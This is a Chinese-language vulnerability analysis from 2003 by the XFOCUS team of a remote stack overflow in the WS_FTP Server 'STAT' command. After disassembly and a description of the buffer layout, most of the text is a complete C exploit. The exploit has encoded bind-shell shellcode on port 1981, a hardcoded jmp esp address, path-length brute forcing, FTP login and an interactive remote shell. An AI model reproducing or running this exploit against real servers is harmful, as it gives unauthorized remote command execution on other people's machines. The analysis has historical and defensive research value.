WS_FTP FTPD "STAT"命令远程溢出分析创建时间:2003-10-22 文章属性:原创 文章提交:eyas (eyas_at_xfocus.org) WS_FTP FTPD "STAT"命令远程溢出分析 Author : eyas<eyas@xfocus.org> Created : 2003-10-08 Updated : 2003-10-22 开始我并不知道2003-09-04在http://www.securityfocus.com/bid/8542就公布 了这个漏洞,上面写的发现者是pejman。我是10月份的时候从Dvdman@l33tsecurity.com 处得知这个漏洞的信息的,可能是dvdman也独立发现了这个漏洞吧。 以下分析基于WS_FTP Server 4.0.1.EVAL (47156314)版本,只分析“STAT”命令溢出 的情况。 事实上,WS_FTP在处理STAT命令时,很多地方都有长度判断,但是,有一个地方他遗漏了, 那么,我们的机会就来了。:) 漏洞函数引用关系如下: loc_41200D <- [0] |_ sub_41B523 |_ sub_424BC1 |_ lstrlenA <- [1] |_ sub_424DD8 |_ sub_42D75F |_ lstrcpyA <- [2] [0]判断是否"STAT"命令 .text:0041200D loc_41200D: .text:0041200D push offset aStat_0 .text:00412012 mov ecx, [ebp+8] .text:00412015 push ecx .text:00412016 call __strcmpi .text:0041201B add esp, 8 .text:0041201E test eax, eax .text:00412020 jnz short loc_41202F .text:00412022 mov ecx, [ebp-4] .text:00412025 call sub_41B523 .text:0041202A jmp loc_412775 [1]长度判断,file full path name 长度不能超过0x200 .text:00424D4A mov eax, [ebp+lpString2] ; our_buff .text:00424D4D push eax ; lpString .text:00424D4E call ds:lstrlenA .text:00424D54 mov ecx, [ebp+var_8] ; get path len .text:00424D57 add ecx, eax ; get total len .text:00424D59 mov [ebp+var_8], ecx .text:00424D5C mov edx, [ebp+var_8] //total len compare with 0x200 .text:00424D5F cmp edx, [ebp+arg_10] ; .text:00424D62 jle short loc_424D69 //<- need jmp .text:00424D64 mov eax, [ebp+var_4] .text:00424D67 jmp short loc_424DD2 //<- exit! [2]file full path name copy to stack buffer,overflow!! .text:0042D7C3 mov eax, [ebp+8] //<- file full path name .text:0042D7C6 push eax ; lpString2 .text:0042D7C7 lea ecx, [ebp-0x118] .text:0042D7CD push ecx ; lpString1 .text:0042D7CE call ds:lstrcpyA ...... .text:0042DD9B retn 8 看起来是个简单的堆栈溢出,但利用起来挺麻烦的。因为: 1)我们不知道路径长度,所以不能准确的覆盖函数返回地址。 2)BUFF长度最大只能有0x200(包括路径),溢出点在0x118,不管是前面和后面, 存放sc的空间都不大,放个得到cmd shell的sc是不够的。除非搞个tiny的shellcode。 这个有点象IIS WEBDAV溢出的利用,不过这比WEBDAV简单得多。 其实我们可以利用长度判断的限制,准确的猜测到路径的长度,并且猜测过程中不会把 ws_ftp搞当掉,而且在猜中的同时准确的把jmp esp的地址覆盖在函数的返回地址上。 如何猜测路径长度我就不罗嗦了,可以参见<<WebDav漏洞简单分析及通用exploit设计>>这篇 文章。 为什么不覆盖SEH?没错,出现溢出的函数sub_42D75F它自己是建立了异常处理函数,并且我们 可以覆盖到,但是溢出后,sub_42D75F函数在后续操作中、直到它返回也不会触发异常。并且因为 buff长度有限,上级的SEH覆盖不了,所以我们只有覆盖返回地址这条路可走了。 为了写这个exp,还专门修改了一下sc,我们发送的buff结构如下: +------------------------------------------------+ | | |path|pad1|sc1|jmp 0x2c|nop(0x14)|ret|nop(8)|jmp back(5)|nop(7)|sc2|pad2| | | +--------------------------------------+ |<--------- 0x118+4 bytes ------>|<------- 0x200-1-0x118-4 bytes ------>| 1) path不是我们发送的。 2) 函数ret的时候是retn 8,所以要有nop(8)。 3) 溢出后,函数有两个变量会被改变,所以要有nop(0x14)来跳过。 4) nop(7) for what? I don't tell you. ^_^ That's ALL! 如果有错误的地方请斧正,如果你有更好的idea,与我分享?谢谢! /* x-ws_ftp.c - x86/win32 WS_FTP FTPD "STAT" command remote * stack buffer overflow exploit * * (C) COPYRIGHT XFOCUS Security Team, 2003 * All Rights Reserved * * ----------------------------------------------------------------------- * Author : eyas <eyas@xfocus.org> * : http://www.xfocus.org * Maintain : XFOCUS Security Team <security@xfocus.org> * Version : 1.0 * * Test : Windows 2000 server EN * + WS_FTP Server 4.0.1.EVAL (46006050) * Notes : This vul discover by Dvdman@l33tsecurity.com! To exploit this vul, you must have a account can login into ws_ftp. * Greets : dvdman and all member of XFOCUS Security Team. * Complie : cl x-ws_ftp.c * Usage : x-ws_ftp.exe <-i ip> <-t type> <-u user> <-p pass> [-l pathlen] [-P port] * [type] * 0 win2k sp4 user32.dll * * Add more targets's jmp esp addr by yourself, * and then pls email a copy to me, thanks. :) * * Date : 2003-10-08 * Revised : * * Revise History: * * ------- start rip from dvdman's exp ----------------- * VULN VERSIONS: <= X2 WS_FTP Server 4.0.1 (1323562169) * VULN COMMANDS: APPE,STOR,STAT,RMD,RNFR,RNTO,AND MORE * -------- rip end ------------------------------------ */ #include <winsock2.h> #include <windows.h> #include <stdio.h> #include <stdlib.h> #pragma comment(lib,"ws2_32") #define maxlen (0x200-1)//能够触发溢出的最大长度 #define overpoint (0x118+4)//溢出点 #define sc_jmp_addr_offset (0xa4+22)//sc中存放jmp addr的offset #define mini_path 0xf//最短路径 #define ERR_EXP_OK 0 #define ERR_EXP_CONNECT -1 #define ERR_EXP_FAILED 1 #define version "1.0" //modify it by yourself struct { DWORD dwJMP; char *szDescription; }targets[] = { {0x77E14C29, "win2k sp4 user32.dll"}, },v; //total = 366 (0x16E) bytes (xor with 0x93) unsigned char sc_bind_1981[]= //decoder 22 bytes ->动态定位需解码sc地址 "\xEB\x0F\x5B\x80\x33\x93\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74" "\x05\xE8\xEC\xFF\xFF\xFF" //sc_bind_1981 for 2k/xp/2003 by ey4s //speacial version for ws_ftp base on v1.03.10.07 //XOR with 0x93 (367 0x16F bytes) "\x12\x7F\x93\x91\x93\x93\x7A\xA4\x92\x93\x93\xCC\xF7\x32\xA3\x93" "\x93\x93\x18\xD3\x9F\x18\xE3\x8F\x3E\x18\xFB\x9B\xF9\x97\xCA\x7B" "\x4A\x93\x93\x93\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC" "\xC7\x6C\xC4\x6F\x18\x7B\xF9\x95\xCA\x7B\x2C\x93\x93\x93\x71\x6A" "\x12\x7F\x03\x92\x93\x93\xC7\xFB\x91\x91\x93\x93\x6C\xC4\x7B\xC3" "\xC3\xC3\xC3\xF9\x92\xF9\x91\x6C\xC4\x63\x18\x4B\x18\x7F\x54\xD6" "\x93\x91\x93\x94\x2E\xA0\x53\x1A\xD6\x97\xF9\x83\xC6\xC0\x6C\xC4" "\x67\xC0\xF9\x92\xC0\x6C\xC4\x6B\xC3\xC3\xC0\x6C\xC4\x6F\xC3\x10" "\x7F\xCB\x18\x67\xA0\x48\xF9\x83\xCA\x1A\x8F\x1D\x71\x68\x78\xBF" "\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3" "\xD3\xD3\xD3\xD3\x03\x03\x03\x03\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3" "\xE9\x35\xFF\xFF\xFF\xD3\xD3\xD3\xD3\xD3\xD3\xD3\x1A\xD5\xAB\x1A" "\xD5\xAF\x1A\xD5\xD3\x54\xD5\xBF\x92\x92\x93\x93\x1E\xD5\xD7\xC3" "\xC5\xC0\xC0\xC0\xF9\x92\xC0\xC0\x1E\xD5\xC7\x54\x93\xF0\xFE\xF7" "\x93\xC3\xC0\x6C\xC4\x73\xA0\x53\xDB\xC3\x6C\xE5\xD7\x6C\xC4\x4F" "\x10\x57\xCB\x6C\xC4\x7F\x6C\xC4\x7F\xC3\x6C\xC4\x4B\xC2\x18\xE6" "\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA" "\xD2\x3E\x90\x56\xA0\x48\xA0\x41\x9C\x2D\x83\xA9\x45\xE7\x9B\x52" "\x58\x88\x90\x49\xD3\x78\x7C\xA8\x8C\xE6\x76\xCD\x18\xCD\xB7\x90" "\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38" "\xCA\x50\x7B\x57\x6D\x6C\x6C\x7A\x28\x50\x3D\x27\xEE\x86\x0B\x58" "\xD1\xE4\x2B\x4F\x4E\x89\xA0\xBE\x87\xC5\x3D\x55\xB8\x2E\xBD\x4D" "\xC4\xE1\x37\xB7\x21\xA1\x93\x9D\xCE\x58\x4D\xE7\xB1\xF0\x5B" //decode end sign "\x45\x59\x34\x53"; unsigned char *szSend[3]; unsigned char szSTAT[0x1000]; int iType; int iPort=21; char *ip=NULL, *pUser=NULL, *pPass=NULL; char user[128],pass[128]; void shell (int sock); void usage(char *p); int SendExploit(int iPathLen); void main(int argc, char **argv) { int i, iPathLen=0, ret; printf( "WS_FTP FTPD remote stack buffer overflow exp v%s\n" "This version can exploit WS_FTP Server 4.0.1.EVAL\n" "Vul discover by Dvdman@l33tsecurity.com\n" "Code by eyas@xfocus.org\n" "http://www.xfocus.net\n" "Create: 2003-10-08\n", version); if(argc < 9) { usage(argv[0]); return; } for(i=1;i<argc;i+=2) { if(strlen(argv[i]) != 2) { usage(argv[0]); return; } //检查是否缺少参数 if(i == argc-1) { usage(argv[0]); return; } switch(argv[i][1]) { case 'i': ip=argv[i+1]; break; case 't': iType = atoi(argv[i+1]); break; case 'P': iPort=atoi(argv[i+1]); break; case 'p': pPass = argv[i+1]; break; case 'u': pUser=argv[i+1]; break; case 'l': iPathLen=atoi(argv[i+1]); break; } } if((!ip) || (!user) || (!pass)) { usage(argv[0]); printf("[-] Invalid parameter.\n"); return; } if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) ) { usage(argv[0]); printf("[-] Invalid type.\n"); return; } if( (iPathLen>0) && (iPathLen<mini_path) ) { printf("[-] Hey, guy, mini path is %d.\n", mini_path); return; } _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser); user[sizeof(user)-1]='\0'; _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass); pass[sizeof(pass)-1]='\0'; szSend[0] = user;//user szSend[1] = pass;//pass szSend[2] = szSTAT; if(iPathLen) SendExploit(iPathLen); else { for(i=mini_path;;i++) { ret = SendExploit(i); switch(ret) { case ERR_EXP_FAILED: break; case ERR_EXP_CONNECT: case ERR_EXP_OK: return; break; } } } return; } /* ripped from TESO code and modifed by ey4s for win32 */ void shell (int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("[-] Connection closed.\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("[-] Connection closed.\n"); return; } } } } void usage(char *p) { int i; printf( "Usage: %s <-i ip> <-t type> <-u user> <-p pass> [-l pathlen] [-P port]\n" "[type]\n", p); for(i=0;i<sizeof(targets)/sizeof(v);i++) { printf("%d\t%s\n", i, targets[i].szDescription); } } int SendExploit(int iPathLen) { struct sockaddr_in sa, server; WSADATA wsd; SOCKET s,s2; int i,iErr, ret, pad1,pad2; char szRecvBuff[0x1000]; int retcode = ERR_EXP_CONNECT; printf("\n[+] -=-= Try type %d, path %d. -=-=\n", iType, iPathLen); memcpy(&sc_bind_1981[sc_jmp_addr_offset], &targets[iType].dwJMP, 4); memset(szSTAT, 0, sizeof(szSTAT)); strcpy(szSTAT, "STAT "); //计算第一部分填充多少字节 //如果path估算小了,那么buff就会超过0x200,就不会溢出了:) pad1 = overpoint - sc_jmp_addr_offset - iPathLen; if(pad1<0) { printf( "[-] You can't try any more, path reach the max vaule.\n" " If you want to try longer path, change the sc by yourself.\n"); exit(1); } for(i=0;i<pad1;i++) strcat(szSTAT, "a"); strcat(szSTAT, sc_bind_1981); //计算后面要填充多少字节 pad2 = maxlen - overpoint; //减去已经填充的 pad2 -= (sizeof(sc_bind_1981)-1-sc_jmp_addr_offset); if(pad2<0) { printf("[-] shellcode too long.\n"); exit(1); } for(i=0;i<pad2;i++) strcat(szSTAT, "b"); strcat(szSTAT, "\r\n"); if(strlen(szSTAT) >= sizeof(szSTAT)) { printf("[-] stack buffer overflow.\n"); exit(1); } __try { if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { printf("[-] WSAStartup error:%d\n", WSAGetLastError()); __leave; } s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(s == INVALID_SOCKET) { printf("[-] Create socket failed:%d",GetLastError()); __leave; } sa.sin_family=AF_INET; sa.sin_port=htons(iPort); sa.sin_addr.S_un.S_addr=inet_addr(ip); iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa)); if(iErr == SOCKET_ERROR) { printf("[-] connect to target:21 error:%d\n", GetLastError()); __leave; } printf("[+] connect to %s:%d success.\n", ip, iPort); Sleep(1000); for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++) { memset(szRecvBuff, 0, sizeof(szRecvBuff)); iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0); if(iErr == SOCKET_ERROR) { printf("[-] recv buffer error:%d.\n", WSAGetLastError()); __leave; } printf("[+] Recv: %s", szRecvBuff); iErr = send(s, szSend[i], strlen(szSend[i]),0); if(iErr == SOCKET_ERROR) { printf("[-] send buffer error:%d.\n", WSAGetLastError()); __leave; } if(i==sizeof(szSend)/sizeof(szSend[0])-1) printf("[+] Send shellcode %d(0x%X) bytes.\n", iErr, iErr); else printf("[+] Send: %s", szSend[i]); Sleep(100); } printf("[+] Wait from shell.\n"); Sleep(2000); s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port = htons(1981); server.sin_addr.s_addr=inet_addr(ip); ret = connect(s2, (struct sockaddr *)&server, sizeof(server)); if(ret!=0) { printf("[-] Exploit seem failed.\n"); retcode = ERR_EXP_FAILED; __leave; } printf("[+] Exploit success! Have fun! :)\n"); shell(s2); retcode = ERR_EXP_OK; } __finally { if(s != INVALID_SOCKET) closesocket(s); if(s2 != INVALID_SOCKET) closesocket(s); WSACleanup(); } return retcode; } |
